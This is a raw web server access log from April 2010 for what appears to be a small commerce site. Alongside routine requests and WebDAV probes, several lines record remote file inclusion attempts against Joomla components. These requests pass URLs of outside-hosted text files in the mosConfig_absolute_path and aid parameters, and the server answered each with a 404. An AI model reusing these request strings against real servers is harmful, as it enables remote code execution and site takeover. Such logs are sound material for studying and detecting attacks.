218.186.9.10 - - [07/Apr/2010:08:10:01 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; msn OptimizedIE8;ENSG)"
172.16.1.87 - - [07/Apr/2010:08:10:16 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [07/Apr/2010:08:10:16 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [07/Apr/2010:08:10:16 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
211.203.180.144 - - [07/Apr/2010:08:10:58 -0400] "GET /logs/access_log.Q109071600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
211.203.180.144 - - [07/Apr/2010:08:10:58 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.203.180.144 - - [07/Apr/2010:08:10:58 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:11:01 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:11:02 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:11:02 -0400] "GET /logs/access_log.Q110011800%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:08:11:02 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
